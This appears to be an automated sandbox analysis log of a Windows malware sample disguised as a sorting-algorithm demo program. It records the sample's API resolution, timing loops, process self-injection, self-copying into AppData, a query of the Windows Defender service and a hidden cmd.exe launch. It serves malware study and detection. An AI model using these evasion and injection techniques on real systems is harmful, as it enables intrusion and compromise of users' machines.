Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarIdiv, address_out = 0x75a7f00a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarImp, address_out = 0x75a7ef47 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMod, address_out = 0x75a7f15e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMul, address_out = 0x75a7dbd4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarOr, address_out = 0x75a7ecfa True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarPow, address_out = 0x75a7ea66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarSub, address_out = 0x75a7d332 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarXor, address_out = 0x75a7ee2e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAbs, address_out = 0x75a7ca11 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFix, address_out = 0x75a7cc5f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarInt, address_out = 0x75a7cde7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNeg, address_out = 0x75a7c802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNot, address_out = 0x75a7ec66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarRound, address_out = 0x75a7d155 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCmp, address_out = 0x75a1b0dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecAdd, address_out = 0x75a35f3e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecCmp, address_out = 0x75a24fd0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCat, address_out = 0x75a20d2c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCyMulI4, address_out = 0x75a359ed True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCmp, address_out = 0x75a0f8b8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ole32.dll, base_address = 0x75be0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstanceEx, address_out = 0x75c29d4e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromProgIDEx, address_out = 0x75bf0782 True 1
Fn
Module Get Filename process_name = c:\programdata\surtq5qk9h.exe, file_name_orig = C:\ProgramData\suRtQ5QK9h.exe, size = 260 True 2
Fn
Module Load module_name = SXS.DLL, base_address = 0x752d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\sxs.dll, function = SxsOleAut32MapIIDOrCLSIDToTypeLibrary, address_out = 0x75317685 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\user32.dll, base_address = 0x771c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x771d7d2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromWindow, address_out = 0x771e3150 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromRect, address_out = 0x771fe7a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromPoint, address_out = 0x771e5281 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EnumDisplayMonitors, address_out = 0x771e451a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMonitorInfoA, address_out = 0x771e4413 True 1
Fn
Window Create class_name = ThunderRT6Main, wndproc_parameter = 0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors False 1
Fn
System Register Hook type = WH_MSGFILTER, hookproc_address = 0x729a1e09 True 1
Fn
Window Create class_name = VBMsoStdCompMgr, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = VBMsoStdCompMgr, index = 0, new_long = 246685852 False 1
Fn
Window Create class_name = VBFocusRT6, wndproc_parameter = 0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors False 1
Fn
System Get Info type = Operating System True 1
Fn
Keyboard Get Info type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 True 1
Fn
Window Create window_name = Sorting Algorithm Comparison, wndproc_parameter = 0 True 1
Fn
Window Create window_name = RadixSort, wndproc_parameter = 0 True 1
Fn
Window Create window_name = MergeSort, wndproc_parameter = 0 True 1
Fn
Window Create window_name = QuickSort, wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:36 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 266808 True 4
Fn
System Get Time type = Ticks, time = 266824 True 10
Fn
System Get Time type = Ticks, time = 266839 True 12
Fn
System Get Time type = Ticks, time = 266855 True 3
Fn
System Get Time type = Ticks, time = 266870 True 9
Fn
System Get Time type = Ticks, time = 266886 True 1
Fn
System Get Time type = Ticks, time = 266902 True 2
Fn
System Get Time type = Ticks, time = 266917 True 2
Fn
System Get Time type = Ticks, time = 266933 True 9
Fn
System Get Time type = Ticks, time = 266948 True 6
Fn
System Get Time type = Ticks, time = 266964 True 2
Fn
System Get Time type = Ticks, time = 266980 True 1
Fn
System Get Time type = Ticks, time = 268306 True 1
Fn
System Get Time type = Ticks, time = 268321 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 268384 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 268493 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 268602 True 1
Fn
System Get Time type = Ticks, time = 268696 True 4
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 268711 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 268742 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 268774 True 1
Fn
System Get Time type = Ticks, time = 268836 True 4
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 268852 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 268867 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 268883 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 268898 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 268914 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 268961 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 268992 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 269008 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 269117 True 5
Fn
System Get Time type = Ticks, time = 269148 True 5
Fn
System Get Time type = Ticks, time = 269164 True 17
Fn
System Get Time type = Ticks, time = 269179 True 3
Fn
System Get Time type = Ticks, time = 269226 True 5
Fn
System Get Time type = Ticks, time = 269382 True 5
Fn
System Get Time type = Ticks, time = 269507 True 5
Fn
System Get Time type = Ticks, time = 269522 True 1
Fn
System Get Time type = Ticks, time = 269569 True 4
Fn
System Get Time type = Ticks, time = 269616 True 5
Fn
System Get Time type = Ticks, time = 269632 True 1
Fn
System Get Time type = Ticks, time = 269663 True 4
Fn
System Get Time type = Ticks, time = 269710 True 5
Fn
System Get Time type = Ticks, time = 269756 True 5
Fn
System Get Time type = Ticks, time = 269803 True 5
Fn
System Get Time type = Ticks, time = 269850 True 5
Fn
System Get Time type = Ticks, time = 269959 True 5
Fn
System Get Time type = Ticks, time = 270037 True 5
Fn
System Get Time type = Ticks, time = 270100 True 5
Fn
System Get Time type = Ticks, time = 270146 True 5
Fn
System Get Time type = Ticks, time = 270193 True 5
Fn
System Get Time type = Ticks, time = 270224 True 5
Fn
System Get Time type = Ticks, time = 270287 True 5
Fn
System Get Time type = Ticks, time = 270334 True 5
Fn
System Get Time type = Ticks, time = 270380 True 5
Fn
System Get Time type = Ticks, time = 270427 True 5
Fn
System Get Time type = Ticks, time = 270474 True 5
Fn
System Get Time type = Ticks, time = 270521 True 5
Fn
System Get Time type = Ticks, time = 270583 True 5
Fn
System Get Time type = Ticks, time = 270646 True 1
Fn
System Get Time type = Ticks, time = 270739 True 4
Fn
System Get Time type = Ticks, time = 270786 True 5
Fn
System Get Time type = Ticks, time = 270833 True 5
Fn
System Get Time type = Ticks, time = 270880 True 5
Fn
System Get Time type = Ticks, time = 270926 True 5
Fn
System Get Time type = Ticks, time = 270973 True 5
Fn
System Get Time type = Ticks, time = 271020 True 5
Fn
System Get Time type = Ticks, time = 271067 True 5
Fn
System Get Time type = Ticks, time = 271114 True 5
Fn
System Get Time type = Ticks, time = 271160 True 5
Fn
System Get Time type = Ticks, time = 271207 True 5
Fn
System Get Time type = Ticks, time = 271254 True 5
Fn
System Get Time type = Ticks, time = 271301 True 5
Fn
System Get Time type = Ticks, time = 271348 True 5
Fn
System Get Time type = Ticks, time = 271394 True 5
Fn
System Get Time type = Ticks, time = 271441 True 5
Fn
System Get Time type = Ticks, time = 271488 True 5
Fn
System Get Time type = Ticks, time = 271535 True 5
Fn
System Get Time type = Ticks, time = 271582 True 5
Fn
System Get Time type = Ticks, time = 271628 True 5
Fn
System Get Time type = Ticks, time = 271675 True 5
Fn
System Get Time type = Ticks, time = 271722 True 5
Fn
System Get Time type = Ticks, time = 271738 True 5
Fn
System Get Time type = Ticks, time = 271769 True 5
Fn
System Get Time type = Ticks, time = 271800 True 1
Fn
System Get Time type = Ticks, time = 271831 True 4
Fn
System Get Time type = Ticks, time = 271878 True 5
Fn
System Get Time type = Ticks, time = 271925 True 5
Fn
System Get Time type = Ticks, time = 271972 True 5
Fn
System Get Time type = Ticks, time = 272018 True 5
Fn
System Get Time type = Ticks, time = 272065 True 10
Fn
System Get Time type = Ticks, time = 272112 True 5
Fn
System Get Time type = Ticks, time = 272190 True 5
Fn
System Get Time type = Ticks, time = 272237 True 50
Fn
System Get Time type = Ticks, time = 272252 True 30
Fn
System Get Time type = Ticks, time = 272284 True 5
Fn
System Get Time type = Ticks, time = 272299 True 5
Fn
System Get Time type = Ticks, time = 272330 True 15
Fn
System Get Time type = Ticks, time = 272362 True 15
Fn
System Get Time type = Ticks, time = 272377 True 5
Fn
System Get Time type = Ticks, time = 272455 True 10
Fn
System Get Time type = Ticks, time = 272471 True 5
Fn
System Get Time type = Ticks, time = 272486 True 20
Fn
System Get Time type = Ticks, time = 272502 True 10
Fn
System Get Time type = Ticks, time = 272518 True 25
Fn
System Get Time type = Ticks, time = 272533 True 20
Fn
System Get Time type = Ticks, time = 272549 True 25
Fn
System Get Time type = Ticks, time = 272564 True 45
Fn
System Get Time type = Ticks, time = 272580 True 30
Fn
System Get Time type = Ticks, time = 272596 True 30
Fn
System Get Time type = Ticks, time = 272611 True 30
Fn
System Get Time type = Ticks, time = 272627 True 6
Fn
System Get Time type = Ticks, time = 272642 True 39
Fn
System Get Time type = Ticks, time = 272658 True 35
Fn
System Get Time type = Ticks, time = 272674 True 20
Fn
System Get Time type = Ticks, time = 272736 True 15
Fn
System Get Time type = Ticks, time = 272752 True 25
Fn
System Get Time type = Ticks, time = 272767 True 10
Fn
System Get Time type = Ticks, time = 272783 True 11
Fn
System Get Time type = Ticks, time = 272798 True 4
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:44 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 272814 True 5
Fn
System Get Time type = Ticks, time = 272830 True 1
Fn
System Get Time type = Ticks, time = 272845 True 4
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:44 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 272923 True 5
Fn
System Get Time type = Ticks, time = 272939 True 5
Fn
System Get Time type = Ticks, time = 272954 True 5
Fn
System Get Time type = Ticks, time = 272970 True 5
Fn
System Get Time type = Ticks, time = 273017 True 5
Fn
System Get Time type = Ticks, time = 273032 True 1
Fn
System Get Time type = Ticks, time = 273048 True 4
Fn
System Get Time type = Ticks, time = 273064 True 5
Fn
System Get Time type = Ticks, time = 273095 True 5
Fn
System Get Time type = Ticks, time = 273142 True 5
Fn
System Get Time type = Ticks, time = 273173 True 5
Fn
System Get Time type = Ticks, time = 273220 True 5
Fn
System Get Time type = Ticks, time = 273266 True 5
Fn
System Get Time type = Ticks, time = 273360 True 5
Fn
System Get Time type = Ticks, time = 273376 True 5
Fn
System Get Time type = Ticks, time = 273391 True 20
Fn
System Get Time type = Ticks, time = 273407 True 25
Fn
System Get Time type = Ticks, time = 273422 True 65
Fn
System Get Time type = Ticks, time = 273438 True 15
Fn
System Get Time type = Ticks, time = 273454 True 15
Fn
System Get Time type = Ticks, time = 273469 True 15
Fn
System Get Time type = Ticks, time = 273485 True 25
Fn
System Get Time type = Ticks, time = 273500 True 15
Fn
System Get Time type = Ticks, time = 273516 True 20
Fn
System Get Time type = Ticks, time = 273532 True 5
Fn
System Get Time type = Ticks, time = 273547 True 25
Fn
System Get Time type = Ticks, time = 273563 True 10
Fn
System Get Time type = Ticks, time = 273610 True 5
Fn
System Get Time type = Ticks, time = 273656 True 5
Fn
System Get Time type = Ticks, time = 273703 True 5
Fn
System Get Time type = Ticks, time = 273734 True 5
Fn
System Get Time type = Ticks, time = 273750 True 15
Fn
System Get Time type = Ticks, time = 273766 True 5
Fn
System Get Time type = Ticks, time = 273781 True 5
Fn
System Get Time type = Ticks, time = 273812 True 1
Fn
System Get Time type = Ticks, time = 273828 True 4
Fn
System Get Time type = Ticks, time = 273859 True 5
Fn
System Get Time type = Ticks, time = 273875 True 5
Fn
System Get Time type = Ticks, time = 273906 True 5
Fn
System Get Time type = Ticks, time = 273953 True 5
Fn
System Get Time type = Ticks, time = 273968 True 1
Fn
System Get Time type = Ticks, time = 273984 True 4
Fn
System Get Time type = Ticks, time = 274000 True 5
Fn
System Get Time type = Ticks, time = 274031 True 5
Fn
System Get Time type = Ticks, time = 274046 True 10
Fn
System Get Time type = Ticks, time = 274062 True 5
Fn
System Get Time type = Ticks, time = 274078 True 5
Fn
System Get Time type = Ticks, time = 274093 True 5
Fn
System Get Time type = Ticks, time = 274109 True 5
Fn
System Get Time type = Ticks, time = 274124 True 10
Fn
System Get Time type = Ticks, time = 274140 True 5
Fn
System Get Time type = Ticks, time = 274156 True 5
Fn
System Get Time type = Ticks, time = 274171 True 5
Fn
System Get Time type = Ticks, time = 274187 True 5
Fn
System Get Time type = Ticks, time = 274202 True 5
Fn
System Get Time type = Ticks, time = 274218 True 10
Fn
System Get Time type = Ticks, time = 274234 True 5
Fn
System Get Time type = Ticks, time = 274249 True 5
Fn
System Get Time type = Ticks, time = 274265 True 20
Fn
System Get Time type = Ticks, time = 274280 True 40
Fn
System Get Time type = Ticks, time = 274296 True 40
Fn
System Get Time type = Ticks, time = 274312 True 35
Fn
System Get Time type = Ticks, time = 274327 True 40
Fn
System Get Time type = Ticks, time = 274343 True 35
Fn
System Get Time type = Ticks, time = 274358 True 40
Fn
System Get Time type = Ticks, time = 274374 True 35
Fn
System Get Time type = Ticks, time = 274390 True 40
Fn
System Get Time type = Ticks, time = 274405 True 30
Fn
System Get Time type = Ticks, time = 274421 True 20
Fn
System Get Time type = Ticks, time = 274436 True 33
Fn
System Get Time type = Ticks, time = 274452 True 37
Fn
System Get Time type = Ticks, time = 274468 True 40
Fn
System Get Time type = Ticks, time = 274483 True 23
Fn
System Get Time type = Ticks, time = 274499 True 16
Fn
System Get Time type = Ticks, time = 274514 True 16
Fn
System Get Time type = Ticks, time = 274530 True 16
Fn
System Get Time type = Ticks, time = 274546 True 16
Fn
System Get Time type = Ticks, time = 274561 True 16
Fn
System Get Time type = Ticks, time = 274577 True 16
Fn
System Get Time type = Ticks, time = 274592 True 10
Fn
Process #14: oyvgkgw.exe
27 0
»
Information Value
ID #14
File Name c:\programdata\oyvgkgw.exe
Command Line "C:\ProgramData\oyvGkGw.exe"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:03:40, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:28
OS Process Information
»
Information Value
PID 0x62c
Parent PID 0x64 (c:\programdata\oyvgkgw.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 708
0x 148
0x 9BC
0x 9B8
0x 9B4
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
imm32.dll 0x00020000 0x0003dfff Memory Mapped File Readable False False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000090000 0x00090000 0x00093fff Pagefile Backed Memory Readable True False False -
private_0x00000000000a0000 0x000a0000 0x0011ffff Private Memory Readable, Writable True False False -
private_0x0000000000120000 0x00120000 0x0021ffff Private Memory Readable, Writable True False False -
locale.nls 0x00220000 0x00286fff Memory Mapped File Readable False False False -
private_0x0000000000290000 0x00290000 0x002cffff Private Memory Readable, Writable True False False -
private_0x00000000002d0000 0x002d0000 0x003cffff Private Memory Readable, Writable True False False -
private_0x00000000003d0000 0x003d0000 0x003dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000003d0000 0x003d0000 0x003e0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000003d0000 0x003d0000 0x003e1fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000003d0000 0x003d0000 0x003d0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000003e0000 0x003e0000 0x003f0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000003e0000 0x003e0000 0x003f1fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000003e0000 0x003e0000 0x003e0fff Private Memory Readable, Writable True False False -
pagefile_0x00000000003f0000 0x003f0000 0x003f0fff Pagefile Backed Memory Readable True False False -
private_0x0000000000400000 0x00400000 0x0043cfff Private Memory Readable, Writable, Executable True False False -
pagefile_0x0000000000440000 0x00440000 0x00440fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000450000 0x00450000 0x00450fff Pagefile Backed Memory Readable True False False -
private_0x0000000000460000 0x00460000 0x0cabffff Private Memory Readable, Writable True False False -
private_0x000000000cac0000 0x0cac0000 0x0ccbffff Private Memory Readable, Writable True False False -
pagefile_0x000000000cac0000 0x0cac0000 0x0cc47fff Pagefile Backed Memory Readable True False False -
rsaenh.dll 0x0cc50000 0x0cc8bfff Memory Mapped File Readable False False False -
private_0x000000000cc50000 0x0cc50000 0x0cc8ffff Private Memory Readable, Writable True False False -
private_0x000000000ccb0000 0x0ccb0000 0x0ccbffff Private Memory Readable, Writable True False False -
pagefile_0x000000000ccc0000 0x0ccc0000 0x0ce40fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000000ce50000 0x0ce50000 0x0e24ffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000000e250000 0x0e250000 0x0e65ffff Pagefile Backed Memory Readable, Writable True False False -
sortdefault.nls 0x0e250000 0x0e51efff Memory Mapped File Readable False False False -
pagefile_0x000000000e520000 0x0e520000 0x0e92ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x000000000e520000 0x0e520000 0x0e58ffff Private Memory Readable, Writable True False False -
pagefile_0x000000000e590000 0x0e590000 0x0e66efff Pagefile Backed Memory Readable True False False -
pagefile_0x000000000e660000 0x0e660000 0x0ea6ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x000000000e670000 0x0e670000 0x0e76ffff Private Memory Readable, Writable True False False -
private_0x000000000e770000 0x0e770000 0x0e7affff Private Memory Readable, Writable True False False -
private_0x000000000e7b0000 0x0e7b0000 0x0e8affff Private Memory Readable, Writable True False False -
private_0x000000000e8b0000 0x0e8b0000 0x0e8effff Private Memory Readable, Writable True False False -
private_0x000000000e8f0000 0x0e8f0000 0x0e9effff Private Memory Readable, Writable True False False -
pagefile_0x000000000e930000 0x0e930000 0x0ed3ffff Pagefile Backed Memory Readable, Writable True False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x743c0000 0x743cdfff Memory Mapped File Readable, Writable, Executable False False False -
comsvcs.dll 0x74c10000 0x74d45fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
atl.dll 0x755b0000 0x755c3fff Memory Mapped File Readable, Writable, Executable False False False -
cmlua.dll 0x755f0000 0x755fbfff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x75600000 0x75608fff Memory Mapped File Readable, Writable, Executable False False False -
cmutil.dll 0x75610000 0x7561dfff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76390000 0x76412fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Injection Information
»
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Memory #9: c:\programdata\oyvgkgw.exe 0x89c address = 0x400000, size = 512 True 1
Fn
Data
Modify Memory #9: c:\programdata\oyvgkgw.exe 0x89c address = 0x43c000, size = 512 True 1
Fn
Data
Modify Memory #9: c:\programdata\oyvgkgw.exe 0x89c address = 0x401000, size = 239104 True 1
Fn
Data
Modify Memory #9: c:\programdata\oyvgkgw.exe 0x89c address = 0x7efde008, size = 4 True 1
Fn
Data
Modify Control Flow #9: c:\programdata\oyvgkgw.exe 0x89c os_tid = 0x708, address = 0x77bf01c4 True 1
Fn
Created Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe 0.00 KB MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe 328.05 KB MD5: cbe11e9a9e71737f15e8f1c606ad8d8c
SHA1: 2d4575457d337753a57b7941d13ac9665342641a
SHA256: 6e143481553f9ae7566d2245450f6fe65734b465df03e43905f0fb19f812b343
False
Threads
Thread 0x708
27 0
»
Category Operation Information Success Count Logfile
Module Load module_name = shell32.dll, base_address = 0x76480000 True 1
Fn
Module Load module_name = ntdll.dll, base_address = 0x77be0000 True 1
Fn
Module Load module_name = shlwapi.dll, base_address = 0x773c0000 True 1
Fn
Module Load module_name = advapi32.dll, base_address = 0x77740000 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75be0000 True 1
Fn
System Get Info type = Hardware Information True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Service Open Manager database_name = SERVICES_ACTIVE_DATABASE True 1
Fn
Service Open database_name = SERVICES_ACTIVE_DATABASE True 1
Fn
Service Get Info service_name = WinDefend True 1
Fn
Process Create process_name = C:\Windows\system32\cmd.exe, os_pid = 0x13c, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
